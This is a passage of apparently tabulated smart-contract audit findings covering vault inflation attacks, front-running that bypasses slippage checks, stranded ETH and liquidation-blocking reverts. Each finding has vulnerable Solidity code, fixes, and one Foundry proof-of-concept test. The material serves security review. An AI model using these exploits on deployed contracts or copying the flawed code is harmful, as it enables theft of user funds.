+ 1e18);\\n lastUpdateTimestamp = currentTimestamp;\\n }\\n\\n function getTRate() public view returns (uint256) {\\n uint256 timeDifference = block.timestamp - uint256(lastUpdateTimestamp);\\n return tRate + (borrowFeeRate * timeDifference) / Types.SECONDS_PER_YEAR;\\n }\\n```\\n +Funding#requestWithdraw uses incorrect withdraw address,medium,"When requesting a withdraw, `msg.sender` is used in place of the `from` address. This means that withdraws cannot be initiated on behalf of other users. This will break integrations that depend on this functionality leading to irretrievable funds.\\nFunding.sol#L69-L82\\n```\\nfunction requestWithdraw(\\n Types.State storage state,\\n address from,\\n uint256 primaryAmount,\\n uint256 secondaryAmount\\n)\\n external\\n{\\n require(isWithdrawValid(state, msg.sender, from, primaryAmount, secondaryAmount), Errors.WITHDRAW_INVALID);\\n state.pendingPrimaryWithdraw[msg.sender] = primaryAmount;\\n state.pendingSecondaryWithdraw[msg.sender] = secondaryAmount;\\n state.withdrawExecutionTimestamp[msg.sender] = block.timestamp + state.withdrawTimeLock;\\n emit RequestWithdraw(msg.sender, primaryAmount, secondaryAmount, state.withdrawExecutionTimestamp[msg.sender]);\\n}\\n```\\n\\nAs shown above the withdraw is accidentally queue to `msg.sender` NOT the `from` address. This means that all withdraws started on behalf of another user will actually trigger a withdraw `from` the `operator`. The result is that withdraw cannot be initiated on behalf of other users, even if the allowance is set properly, leading to irretrievable funds",Change all occurrences of `msg.sender` in stage changes to `from` instead.,Requesting withdraws for other users is broken and strands funds,"```\\nfunction requestWithdraw(\\n Types.State storage state,\\n address from,\\n uint256 primaryAmount,\\n uint256 secondaryAmount\\n)\\n external\\n{\\n require(isWithdrawValid(state, msg.sender, from, primaryAmount, secondaryAmount), Errors.WITHDRAW_INVALID);\\n state.pendingPrimaryWithdraw[msg.sender] = primaryAmount;\\n state.pendingSecondaryWithdraw[msg.sender] = secondaryAmount;\\n state.withdrawExecutionTimestamp[msg.sender] = block.timestamp + state.withdrawTimeLock;\\n emit RequestWithdraw(msg.sender, primaryAmount, secondaryAmount, state.withdrawExecutionTimestamp[msg.sender]);\\n}\\n```\\n" +FundRateArbitrage is vulnerable to inflation attacks,medium,"When index is calculated, it is figured by dividing the net value of the contract (including USDC held) by the current supply of earnUSDC. Through deposit and donation this ratio can be inflated. Then when others deposit, their deposit can be taken almost completely via rounding.\\nFundingRateArbitrage.sol#L98-L104\\n```\\nfunction getIndex() public view returns (uint256) {\\n if (totalEarnUSDCBalance == 0) {\\n return 1e18;\\n } else {\\n return SignedDecimalMath.decimalDiv(getNetValue(), totalEarnUSDCBalance);\\n }\\n}\\n```\\n\\nIndex is calculated is by dividing the net value of the contract (including USDC held) by the current supply of totalEarnUSDCBalance. This can be inflated via donation. Assume the user deposits 1 share then donates 100,000e6 USDC. The exchange ratio is now 100,000e18 which causes issues during deposits.\\nFundingRateArbitrage.sol#L258-L275\\n```\\nfunction deposit(uint256 amount) external {\\n require(amount != 0, ""deposit amount is zero"");\\n uint256 feeAmount = amount.decimalMul(depositFeeRate);\\n if (feeAmount > 0) {\\n amount -= feeAmount;\\n IERC20(usdc).transferFrom(msg.sender, owner(), feeAmount);\\n }\\n uint256 earnUSDCAmount = amount.decimalDiv(getIndex());\\n IERC20(usdc).transferFrom(msg.sender, address(this), amount);\\n JOJODealer(jojoDealer).deposit(0, amount, msg.sender);\\n earnUSDCBalance[msg.sender] += earnUSDCAmount;\\n jusdOutside[msg.sender] += amount;\\n totalEarnUSDCBalance += earnUSDCAmount;\\n require(getNetValue() <= maxNetValue, ""net value exceed limitation"");\\n uint256 quota = maxUsdcQuota[msg.sender] == 0 ? defaultUsdcQuota : maxUsdcQuota[msg.sender];\\n require(earnUSDCBalance[msg.sender].decimalMul(getIndex()) <= quota, ""usdc amount bigger than quota"");\\n emit DepositToHedging(msg.sender, amount, feeAmount, earnUSDCAmount);\\n}\\n```\\n\\nNotice earnUSDCAmount is amount / index. With the inflated index that would mean that any deposit under 100,000e6 will get zero shares, making it exactly like the standard ERC4626 inflation attack.",Use a virtual offset as suggested by OZ for their ERC4626 contracts,Subsequent user deposits can be stolen,"```\\nfunction getIndex() public view returns (uint256) {\\n if (totalEarnUSDCBalance == 0) {\\n return 1e18;\\n } else {\\n return SignedDecimalMath.decimalDiv(getNetValue(), totalEarnUSDCBalance);\\n }\\n}\\n```\\n" +"Lender transactions can be front-run, leading to lost funds",high,"Users can mint wfCash tokens via `mintViaUnderlying` by passing a variable `minImpliedRate` to guard against trade slippage. If the market interest is lower than expected by the user, the transaction will revert due to slippage protection. However, if the user mints a share larger than maxFCash, the `minImpliedRate` check is not performed.\\n```\\n function mintViaUnderlying(\\n uint256 depositAmountExternal,\\n uint88 fCashAmount,\\n address receiver,\\n uint32 minImpliedRate//@audit when lendAmount bigger than maxFCash lack of minRate protect.\\n ) external override {\\n (/* */, uint256 maxFCash) = getTotalFCashAvailable();\\n _mintInternal(depositAmountExternal, fCashAmount, receiver, minImpliedRate, maxFCash);\\n }\\n```\\n\\n```\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION);//@audit-info fCashAmount * (underlyingTokenDecimals) / 1e8\\n require(fCashAmountExternal <= depositAmountExternal);\\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);//@audit check this.\\n } \\n```\\n\\nImagine the following scenario:\\nlender deposit Underlying token to `mint` some shares and set a `minImpliedRate` to protect the trsanction\\nalice front-run her transaction invoke `mint` to `mint` some share\\nthe shares of lender `mint` now is bigger than `maxFCash`\\nnow the lender `lending at zero`\\n```\\n function testDepositViaUnderlying() public {\\n address alice = makeAddr(""alice"");\\n deal(address(asset), LENDER, 8800 * precision, true);\\n deal(address(asset), alice, 5000 * precision, true);\\n\\n //alice deal.\\n vm.stopPrank();\\n vm.startPrank(alice);\\n asset.approve(address(w), type(uint256).max);\\n \\n //==============================LENDER START=============================//\\n vm.stopPrank();\\n vm.startPrank(LENDER);\\n asset.approve(address(w), type(uint256).max);\\n //user DAI balance before:\\n assertEq(asset.balanceOf(LENDER), 8800e18);\\n\\n (/* */, uint256 maxFCash) = w.getTotalFCashAvailable();\\n console2.log(""current maxFCash:"",maxFCash);\\n\\n //LENDER mintViaUnderlying will revert due to slippage.\\n uint32 minImpliedRate = 0.15e9;\\n vm.expectRevert(""Trade failed, slippage"");\\n w.mintViaUnderlying(5000e18,5000e8,LENDER,minImpliedRate);\\n //==============================LENDER END=============================//\\n\\n //======================alice frontrun to mint some shares.============//\\n vm.stopPrank();\\n vm.startPrank(alice);\\n w.mint(5000e8,alice);\\n\\n //==========================LENDER TX =================================//\\n vm.stopPrank();\\n vm.startPrank(LENDER);\\n asset.approve(address(w), type(uint256).max);\\n //user DAI balance before:\\n assertEq(asset.balanceOf(LENDER), 8800e18);\\n\\n //LENDER mintViaUnderlying will success.\\n w.mintViaUnderlying(5000e18,5000e8,LENDER,minImpliedRate);\\n\\n console2.log(""lender mint token:"",w.balanceOf(LENDER));\\n console2.log(""lender cost DAI:"",8800e18 - asset.balanceOf(LENDER));\\n }\\n```\\n\\nFrom the above test, we can observe that if `maxFCasha` is greater than `5000e8`, the lender's transaction will be reverted due to ""Trade failed, slippage."" Subsequently, if Alice front-runs by invoking `mint` to create some shares before the lender, the lender's transaction will succeed. Therefore, the lender's `minImpliedRate` check will be bypassed, leading to a loss of funds for the lender.","add a check inside `_mintInternal`\\n```\\n if (maxFCash < fCashAmount) {\\n// Add the line below\\n require(minImpliedRate ==0,""Trade failed, slippage""); \\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION);//@audit-info fCashAmount * (underlyingTokenDecimals) / 1e8\\n require(fCashAmountExternal <= depositAmountExternal);\\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);//@audit check this.\\n }\\n```\\n",lender lost of funds,"```\\n function mintViaUnderlying(\\n uint256 depositAmountExternal,\\n uint88 fCashAmount,\\n address receiver,\\n uint32 minImpliedRate//@audit when lendAmount bigger than maxFCash lack of minRate protect.\\n ) external override {\\n (/* */, uint256 maxFCash) = getTotalFCashAvailable();\\n _mintInternal(depositAmountExternal, fCashAmount, receiver, minImpliedRate, maxFCash);\\n }\\n```\\n" +Residual ETH will not be sent back to users during the minting of wfCash,high,"Residual ETH will not be sent back to users, resulting in a loss of assets.\\nAt Line 67, residual ETH within the `depositUnderlyingToken` function will be sent as Native ETH back to the `msg.sender`, which is this wfCash Wrapper contract.\\n```\\nFile: wfCashLogic.sol\\n function _mintInternal(\\n..SNIP..\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION); \\n require(fCashAmountExternal <= depositAmountExternal); \\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);\\n..SNIP..\\n // Residual tokens will be sent back to msg.sender, not the receiver. The msg.sender\\n // was used to transfer tokens in and these are any residual tokens left that were not\\n // lent out. Sending these tokens back to the receiver risks them getting locked on a\\n // contract that does not have the capability to transfer them off\\n _sendTokensToReceiver(token, msg.sender, isETH, balanceBefore);\\n```\\n\\nWithin the `depositUnderlyingToken` function Line 108 below, the `returnExcessWrapped` parameter is set to `false`, which means it will not wrap the residual ETH, and that Native ETH will be sent back to the caller (wrapper contract)\\n```\\nFile: AccountAction.sol\\n function depositUnderlyingToken(\\n address account,\\n uint16 currencyId,\\n uint256 amountExternalPrecision\\n ) external payable nonReentrant returns (uint256) {\\n..SNIP..\\nFile: AccountAction.sol\\n int256 primeCashReceived = balanceState.depositUnderlyingToken(\\n msg.sender,\\n SafeInt256.toInt(amountExternalPrecision),\\n false // there should never be excess ETH here by definition\\n );\\n```\\n\\nbalanceBefore = amount of WETH before the deposit, balanceAfter = amount of WETH after the deposit.\\nWhen the `_sendTokensToReceiver` is executed, these two values are going to be the same since it is Native ETH that is sent to the wrapper instead of WETH. As a result, the Native ETH that the wrapper received is not forwarded to the users.\\n```\\nFile: wfCashLogic.sol\\n function _sendTokensToReceiver( \\n IERC20 token,\\n address receiver,\\n bool isETH,\\n uint256 balanceBefore\\n ) private returns (uint256 tokensTransferred) {\\n uint256 balanceAfter = isETH ? WETH.balanceOf(address(this)) : token.balanceOf(address(this)); \\n tokensTransferred = balanceAfter - balanceBefore; \\n\\n if (isETH) {\\n // No need to use safeTransfer for WETH since it is known to be compatible\\n IERC20(address(WETH)).transfer(receiver, tokensTransferred); \\n } else if (tokensTransferred > 0) { \\n token.safeTransfer(receiver, tokensTransferred); \\n }\\n }\\n```\\n","If the underlying is ETH, measure the Native ETH balance before and after the `depositUnderlyingToken` is executed. Forward any residual Native ETH to the users, if any.",Loss of assets as the residual ETH is not sent to the users.,"```\\nFile: wfCashLogic.sol\\n function _mintInternal(\\n..SNIP..\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION); \\n require(fCashAmountExternal <= depositAmountExternal); \\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);\\n..SNIP..\\n // Residual tokens will be sent back to msg.sender, not the receiver. The msg.sender\\n // was used to transfer tokens in and these are any residual tokens left that were not\\n // lent out. Sending these tokens back to the receiver risks them getting locked on a\\n // contract that does not have the capability to transfer them off\\n _sendTokensToReceiver(token, msg.sender, isETH, balanceBefore);\\n```\\n" +Residual ETH not sent back when `batchBalanceAndTradeAction` executed,high,"Residual ETH was not sent back when `batchBalanceAndTradeAction` function was executed, resulting in a loss of assets.\\nPer the comment at Line 122 below, when there is residual ETH, native ETH will be sent from Notional V3 to the wrapper contract. In addition, per the comment at Line 109, it is often the case to have an excess amount to be refunded to the users.\\n```\\nFile: wfCashLogic.sol\\n function _lendLegacy(\\nFile: wfCashLogic.sol\\n // If deposit amount external is in excess of the cost to purchase fCash amount (often the case),\\n // then we need to return the difference between postTradeCash - preTradeCash. This is done because\\n // the encoded trade does not automatically withdraw the entire cash balance in case the wrapper\\n // is holding a cash balance.\\n uint256 preTradeCash = getCashBalance();\\n\\n BalanceActionWithTrades[] memory action = EncodeDecode.encodeLegacyLendTrade(\\n currencyId,\\n getMarketIndex(),\\n depositAmountExternal,\\n fCashAmount,\\n minImpliedRate\\n );\\n // Notional will return any residual ETH as the native token. When we _sendTokensToReceiver those\\n // native ETH tokens will be wrapped back to WETH.\\n NotionalV2.batchBalanceAndTradeAction{value: msgValue}(address(this), action); \\n\\n uint256 postTradeCash = getCashBalance(); \\n\\n if (preTradeCash != postTradeCash) { \\n // If ETH, then redeem to WETH (redeemToUnderlying == false)\\n NotionalV2.withdraw(currencyId, _safeUint88(postTradeCash - preTradeCash), !isETH);\\n }\\n }\\n```\\n\\nThis is due to how the `depositUnderlyingExternal` function within Notional V3 is implemented. The `batchBalanceAndTradeAction` will trigger the `depositUnderlyingExternal` function. Within the `depositUnderlyingExternal` function at Line 196, excess ETH will be transferred back to the account (wrapper address) in Native ETH term.\\nNote that for other ERC20 tokens, such as DAI or USDC, the excess will be added to the wrapper's cash balance, and this issue will not occur.\\n```\\nFile: TokenHandler.sol\\n function depositUnderlyingExternal(\\n address account,\\n uint16 currencyId,\\n int256 _underlyingExternalDeposit,\\n PrimeRate memory primeRate,\\n bool returnNativeTokenWrapped\\n ) internal returns (int256 actualTransferExternal, int256 netPrimeSupplyChange) {\\n uint256 underlyingExternalDeposit = _underlyingExternalDeposit.toUint();\\n if (underlyingExternalDeposit == 0) return (0, 0);\\n\\n Token memory underlying = getUnderlyingToken(currencyId);\\n if (underlying.tokenType == TokenType.Ether) {\\n // Underflow checked above\\n if (underlyingExternalDeposit < msg.value) {\\n // Transfer any excess ETH back to the account\\n GenericToken.transferNativeTokenOut(\\n account, msg.value - underlyingExternalDeposit, returnNativeTokenWrapped\\n );\\n } else {\\n require(underlyingExternalDeposit == msg.value, ""ETH Balance"");\\n }\\n\\n actualTransferExternal = _underlyingExternalDeposit;\\n```\\n\\nIn the comment, it mentioned that any residual ETH in native token will be wrapped back to WETH by the `_sendTokensToReceiver`.\\n```\\nFile: wfCashLogic.sol\\n function _lendLegacy(\\n..SNIP..\\n // Notional will return any residual ETH as the native token. When we _sendTokensToReceiver those\\n // native ETH tokens will be wrapped back to WETH.\\n```\\n\\nHowever, the current implementation of the `_sendTokensToReceiver`, as shown below, does not wrap the Native ETH to WETH. Thus, the residual ETH will not be sent back to the users and stuck in the contract.\\n```\\nFile: wfCashLogic.sol\\n function _sendTokensToReceiver( \\n IERC20 token,\\n address receiver,\\n bool isETH,\\n uint256 balanceBefore\\n ) private returns (uint256 tokensTransferred) {\\n uint256 balanceAfter = isETH ? WETH.balanceOf(address(this)) : token.balanceOf(address(this)); \\n tokensTransferred = balanceAfter - balanceBefore; \\n\\n if (isETH) {\\n // No need to use safeTransfer for WETH since it is known to be compatible\\n IERC20(address(WETH)).transfer(receiver, tokensTransferred); \\n } else if (tokensTransferred > 0) { \\n token.safeTransfer(receiver, tokensTransferred); \\n }\\n }\\n```\\n","If the underlying is ETH, measure the Native ETH balance before and after the `batchBalanceAndTradeAction` is executed. Forward any residual Native ETH to the users, if any.",Loss of assets as the residual ETH is not sent to the users.,"```\\nFile: wfCashLogic.sol\\n function _lendLegacy(\\nFile: wfCashLogic.sol\\n // If deposit amount external is in excess of the cost to purchase fCash amount (often the case),\\n // then we need to return the difference between postTradeCash - preTradeCash. This is done because\\n // the encoded trade does not automatically withdraw the entire cash balance in case the wrapper\\n // is holding a cash balance.\\n uint256 preTradeCash = getCashBalance();\\n\\n BalanceActionWithTrades[] memory action = EncodeDecode.encodeLegacyLendTrade(\\n currencyId,\\n getMarketIndex(),\\n depositAmountExternal,\\n fCashAmount,\\n minImpliedRate\\n );\\n // Notional will return any residual ETH as the native token. When we _sendTokensToReceiver those\\n // native ETH tokens will be wrapped back to WETH.\\n NotionalV2.batchBalanceAndTradeAction{value: msgValue}(address(this), action); \\n\\n uint256 postTradeCash = getCashBalance(); \\n\\n if (preTradeCash != postTradeCash) { \\n // If ETH, then redeem to WETH (redeemToUnderlying == false)\\n NotionalV2.withdraw(currencyId, _safeUint88(postTradeCash - preTradeCash), !isETH);\\n }\\n }\\n```\\n" +_isExternalLendingUnhealthy() using stale factors,medium,"In `checkRebalance()` -> _isExternalLendingUnhealthy() -> getTargetExternalLendingAmount(factors) using stale `factors` will lead to inaccurate `targetAmount`, which in turn will cause `checkRebalance()` that should have been rebalance to not execute.\\nrebalancingBot uses `checkRebalance()` to return the `currencyIds []` that need to be `rebalance`.\\ncall order : `checkRebalance()` -> `_isExternalLendingUnhealthy()` -> `ExternalLending.getTargetExternalLendingAmount(factors)`\\n```\\n function _isExternalLendingUnhealthy(\\n uint16 currencyId,\\n IPrimeCashHoldingsOracle oracle,\\n PrimeRate memory pr\\n ) internal view returns (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) {\\n// rest of code\\n\\n PrimeCashFactors memory factors = PrimeCashExchangeRate.getPrimeCashFactors(currencyId);\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n\\n targetAmount = ExternalLending.getTargetExternalLendingAmount(\\n underlyingToken, factors, rebalancingTargetData, oracleData, pr\\n );\\n```\\n\\nA very important logic is to get `targetAmount`. The calculation of this value depends on `factors`. But currently used is PrimeCashFactors memory `factors` = PrimeCashExchangeRate.getPrimeCashFactors(currencyId);. This is not the latest. It has not been aggregated yet. The correct one should be `( /* */,factors) = PrimeCashExchangeRate.getPrimeCashRateView();`.","```\\n function _isExternalLendingUnhealthy(\\n uint16 currencyId,\\n IPrimeCashHoldingsOracle oracle,\\n PrimeRate memory pr\\n ) internal view returns (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) {\\n// rest of code\\n\\n// Remove the line below\\n PrimeCashFactors memory factors = PrimeCashExchangeRate.getPrimeCashFactors(currencyId);\\n// Add the line below\\n ( /* */,PrimeCashFactors memory factors) = PrimeCashExchangeRate.getPrimeCashRateView();\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n\\n targetAmount = ExternalLending.getTargetExternalLendingAmount(\\n underlyingToken, factors, rebalancingTargetData, oracleData, pr\\n );\\n```\\n","Due to the incorrect `targetAmount`, it may cause the `currencyId` that should have been re-executed `Rebalance` to not execute `rebalance`, increasing the risk of the protocol.","```\\n function _isExternalLendingUnhealthy(\\n uint16 currencyId,\\n IPrimeCashHoldingsOracle oracle,\\n PrimeRate memory pr\\n ) internal view returns (bool isExternalLendingUnhealthy, OracleData memory oracleData, uint256 targetAmount) {\\n// rest of code\\n\\n PrimeCashFactors memory factors = PrimeCashExchangeRate.getPrimeCashFactors(currencyId);\\n Token memory underlyingToken = TokenHandler.getUnderlyingToken(currencyId);\\n\\n targetAmount = ExternalLending.getTargetExternalLendingAmount(\\n underlyingToken, factors, rebalancingTargetData, oracleData, pr\\n );\\n```\\n" +recover() using the standard transfer may not be able to retrieve some tokens,medium,"in `SecondaryRewarder.recover()` Using the standard `IERC20.transfer()` If `REWARD_TOKEN` is like `USDT`, it will not be able to transfer out, because this kind of `token` does not return `bool` This will cause it to always `revert`\\n`SecondaryRewarder.recover()` use for\\nAllows the Notional owner to recover any tokens sent to the address or any reward tokens remaining on the contract in excess of the total rewards emitted.\\n```\\n function recover(address token, uint256 amount) external onlyOwner {\\n if (Constants.ETH_ADDRESS == token) {\\n (bool status,) = msg.sender.call{value: amount}("""");\\n require(status);\\n } else {\\n IERC20(token).transfer(msg.sender, amount);\\n }\\n }\\n```\\n\\nUsing the standard `IERC20.transfer()` method to execute the transfer A `token` of a type similar to `USDT` has no return value This will cause the execution of the transfer to always fail","```\\n function recover(address token, uint256 amount) external onlyOwner {\\n if (Constants.ETH_ADDRESS == token) {\\n (bool status,) = msg.sender.call{value: amount}("""");\\n require(status);\\n } else {\\n// Remove the line below\\n IERC20(token).transfer(msg.sender, amount);\\n// Add the line below\\n GenericToken.safeTransferOut(token,msg.sender,amount);\\n }\\n }\\n```\\n","If `REWARD_TOKEN` is like `USDT`, it will not be able to transfer out.","```\\n function recover(address token, uint256 amount) external onlyOwner {\\n if (Constants.ETH_ADDRESS == token) {\\n (bool status,) = msg.sender.call{value: amount}("""");\\n require(status);\\n } else {\\n IERC20(token).transfer(msg.sender, amount);\\n }\\n }\\n```\\n" +Malicious users could block liquidation or perform DOS,medium,"The current implementation uses a ""push"" approach where reward tokens are sent to the recipient during every update, which introduces additional attack surfaces that the attackers can exploit. An attacker could intentionally affect the outcome of the transfer to gain a certain advantage or carry out certain attack.\\nThe worst-case scenario is that malicious users might exploit this trick to intentionally trigger a revert when someone attempts to liquidate their unhealthy accounts to block the liquidation, leaving the protocol with bad debts and potentially leading to insolvency if it accumulates.\\nPer the Audit Scope Documentation provided by the protocol team on the contest page, the reward tokens can be any arbitrary ERC20 tokens\\nWe are extending this functionality to allow nTokens to be incentivized by a secondary reward token. On Arbitrum, this will be ARB as a result of the ARB STIP grant. In the future, this may be any arbitrary ERC20 token\\nLine 231 of the `_claimRewards` function below might revert due to various issues such as:\\ntokens with blacklisting features such as USDC (users might intentionally get into the blacklist to achieve certain outcomes)\\ntokens with hook, which allow the target to revert the transaction intentionally\\nunexpected error in the token's contract\\n```\\nFile: SecondaryRewarder.sol\\n function _claimRewards(address account, uint256 nTokenBalanceBefore, uint256 nTokenBalanceAfter) private { \\n uint256 rewardToClaim = _calculateRewardToClaim(account, nTokenBalanceBefore, accumulatedRewardPerNToken); \\n\\n // Precision here is:\\n // nTokenBalanceAfter (INTERNAL_TOKEN_PRECISION) \\n // accumulatedRewardPerNToken (INCENTIVE_ACCUMULATION_PRECISION) \\n // DIVIDE BY\\n // INTERNAL_TOKEN_PRECISION \\n // => INCENTIVE_ACCUMULATION_PRECISION (1e18) \\n rewardDebtPerAccount[account] = nTokenBalanceAfter \\n .mul(accumulatedRewardPerNToken)\\n .div(uint256(Constants.INTERNAL_TOKEN_PRECISION))\\n .toUint128(); \\n\\n if (0 < rewardToClaim) { \\n GenericToken.safeTransferOut(REWARD_TOKEN, account, rewardToClaim); \\n emit RewardTransfer(REWARD_TOKEN, account, rewardToClaim);\\n }\\n }\\n```\\n\\nIf a revert occurs, the following functions are affected:\\n```\\n_claimRewards -> claimRewardsDirect\\n\\n_claimRewards -> claimRewards -> Incentives.claimIncentives\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler._finalize\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler._finalize -> Used by many functions\\n\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler.claimIncentivesManual\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler.claimIncentivesManual -> nTokenAction.nTokenClaimIncentives (External)\\n_claimRewards -> claimRewards -> Incentives.claimIncentives -> BalancerHandler.claimIncentivesManual -> nTokenAction.nTokenClaimIncentives (External) -> claimNOTE (External)\\n```\\n","The current implementation uses a ""push"" approach where reward tokens are sent to the recipient during every update, which introduces additional attack surfaces that the attackers can exploit.\\nConsider adopting a pull method for users to claim their rewards instead so that the transfer of reward tokens is disconnected from the updating of reward balances.","Many of the core functionalities of the protocol will be affected by the revert. Specifically, the `BalancerHandler._finalize` has the most impact as this function is called by almost every critical functionality of the protocol, including deposit, withdrawal, and liquidation.\\nThe worst-case scenario is that malicious users might exploit this trick to intentionally trigger a revert when someone attempts to liquidate their unhealthy accounts to block the liquidation, leaving the protocol with bad debts and potentially leading to insolvency if it accumulates.","```\\nFile: SecondaryRewarder.sol\\n function _claimRewards(address account, uint256 nTokenBalanceBefore, uint256 nTokenBalanceAfter) private { \\n uint256 rewardToClaim = _calculateRewardToClaim(account, nTokenBalanceBefore, accumulatedRewardPerNToken); \\n\\n // Precision here is:\\n // nTokenBalanceAfter (INTERNAL_TOKEN_PRECISION) \\n // accumulatedRewardPerNToken (INCENTIVE_ACCUMULATION_PRECISION) \\n // DIVIDE BY\\n // INTERNAL_TOKEN_PRECISION \\n // => INCENTIVE_ACCUMULATION_PRECISION (1e18) \\n rewardDebtPerAccount[account] = nTokenBalanceAfter \\n .mul(accumulatedRewardPerNToken)\\n .div(uint256(Constants.INTERNAL_TOKEN_PRECISION))\\n .toUint128(); \\n\\n if (0 < rewardToClaim) { \\n GenericToken.safeTransferOut(REWARD_TOKEN, account, rewardToClaim); \\n emit RewardTransfer(REWARD_TOKEN, account, rewardToClaim);\\n }\\n }\\n```\\n" +Unexpected behavior when calling certain ERC4626 functions,medium,"Unexpected behavior could occur when certain ERC4626 functions are called during the time windows when the fCash has matured but is not yet settled.\\nWhen the fCash has matured, the global settlement does not automatically get executed. The global settlement will only be executed when the first account attempts to settle its own account. The code expects the `pr.supplyFactor` to return zero if the global settlement has not been executed yet after maturity.\\nPer the comment at Line 215, the design of the `_getMaturedCashValue` function is that it expects that if fCash has matured AND the fCash has not yet been settled, the `pr.supplyFactor` will be zero. In this case, the cash value will be zero.\\n```\\nFile: wfCashBase.sol\\n function _getMaturedCashValue(uint256 fCashAmount) internal view returns (uint256) { \\n if (!hasMatured()) return 0; \\n // If the fCash has matured we use the cash balance instead.\\n (uint16 currencyId, uint40 maturity) = getDecodedID(); \\n PrimeRate memory pr = NotionalV2.getSettlementRate(currencyId, maturity); \\n\\n // fCash has not yet been settled\\n if (pr.supplyFactor == 0) return 0; \\n..SNIP..\\n```\\n\\nDuring the time window where the fCash has matured, and none of the accounts triggered an account settlement, the `_getMaturedCashValue` function at Line 33 below will return zero, which will result in the `totalAssets()` function returning zero.\\n```\\nFile: wfCashERC4626.sol\\n function totalAssets() public view override returns (uint256) {\\n if (hasMatured()) {\\n // We calculate the matured cash value of the total supply of fCash. This is\\n // not always equal to the cash balance held by the wrapper contract.\\n uint256 primeCashValue = _getMaturedCashValue(totalSupply());\\n require(primeCashValue < uint256(type(int256).max));\\n int256 externalValue = NotionalV2.convertCashBalanceToExternal(\\n getCurrencyId(), int256(primeCashValue), true\\n );\\n return externalValue >= 0 ? uint256(externalValue) : 0;\\n..SNIP..\\n```\\n",Document the unexpected behavior of the affected functions that could occur during the time windows when the fCash has matured but is not yet settled so that anyone who calls these functions is aware of them.,"The `totalAssets()` function is utilized by key ERC4626 functions within the wrapper, such as the following functions. The side effects of this issue are documented below:\\n`convertToAssets` (Impact = returned value is always zero assets regardless of the inputs)\\n`convertToAssets` > `previewRedeem` (Impact = returned value is always zero assets regardless of the inputs)\\n`convertToAssets` > `previewRedeem` > `maxWithdraw` (Impact = max withdrawal is always zero)\\n`convertToShares` (Impact = Division by zero error, Revert)\\n`convertToShares` > `previewWithdraw` (Impact = Revert)\\nIn addition, any external protocol integrating with wfCash will be vulnerable within this time window as an invalid result (zero) is returned, or a revert might occur. For instance, any external protocol that relies on any of the above-affected functions for computing the withdrawal/minting amount or collateral value will be greatly impacted as the value before the maturity might be 10000, but it will temporarily reset to zero during this time window. Attackers could take advantage of this time window to perform malicious actions.","```\\nFile: wfCashBase.sol\\n function _getMaturedCashValue(uint256 fCashAmount) internal view returns (uint256) { \\n if (!hasMatured()) return 0; \\n // If the fCash has matured we use the cash balance instead.\\n (uint16 currencyId, uint40 maturity) = getDecodedID(); \\n PrimeRate memory pr = NotionalV2.getSettlementRate(currencyId, maturity); \\n\\n // fCash has not yet been settled\\n if (pr.supplyFactor == 0) return 0; \\n..SNIP..\\n```\\n" +getOracleData() maxExternalDeposit not accurate,medium,"in `getOracleData()` The calculation of `maxExternalDeposit` lacks consideration for `reserve.accruedToTreasury`. This leads to `maxExternalDeposit` being too large, causing `Treasury.rebalance()` to fail.\\nin `getOracleData()`\\n```\\n function getOracleData() external view override returns (OracleData memory oracleData) {\\n// rest of code\\n (/* */, uint256 supplyCap) = IPoolDataProvider(POOL_DATA_PROVIDER).getReserveCaps(underlying);\\n // Supply caps are returned as whole token values\\n supplyCap = supplyCap * UNDERLYING_PRECISION;\\n uint256 aTokenSupply = IPoolDataProvider(POOL_DATA_PROVIDER).getATokenTotalSupply(underlying);\\n\\n // If supply cap is zero, that means there is no cap on the pool\\n if (supplyCap == 0) {\\n oracleData.maxExternalDeposit = type(uint256).max;\\n } else if (supplyCap <= aTokenSupply) {\\n oracleData.maxExternalDeposit = 0;\\n } else {\\n // underflow checked as consequence of if / else statement\\n oracleData.maxExternalDeposit = supplyCap - aTokenSupply;\\n }\\n```\\n\\nHowever, AAVE's restrictions are as follows: ValidationLogic.sol#L81-L88\\n```\\n require(\\n supplyCap == 0 ||\\n ((IAToken(reserveCache.aTokenAddress).scaledTotalSupply() +\\n uint256(reserve.accruedToTreasury)).rayMul(reserveCache.nextLiquidityIndex) + amount) <=\\n supplyCap * (10 ** reserveCache.reserveConfiguration.getDecimals()),\\n Errors.SUPPLY_CAP_EXCEEDED\\n );\\n }\\n```\\n\\nThe current implementation lacks subtraction of `uint256(reserve.accruedToTreasury)).rayMul(reserveCache.nextLiquidityIndex)`.",subtract `uint256(reserve.accruedToTreasury)).rayMul(reserveCache.nextLiquidityIndex)`,An overly large `maxExternalDeposit` may cause `rebalance()` to be unable to execute.,"```\\n function getOracleData() external view override returns (OracleData memory oracleData) {\\n// 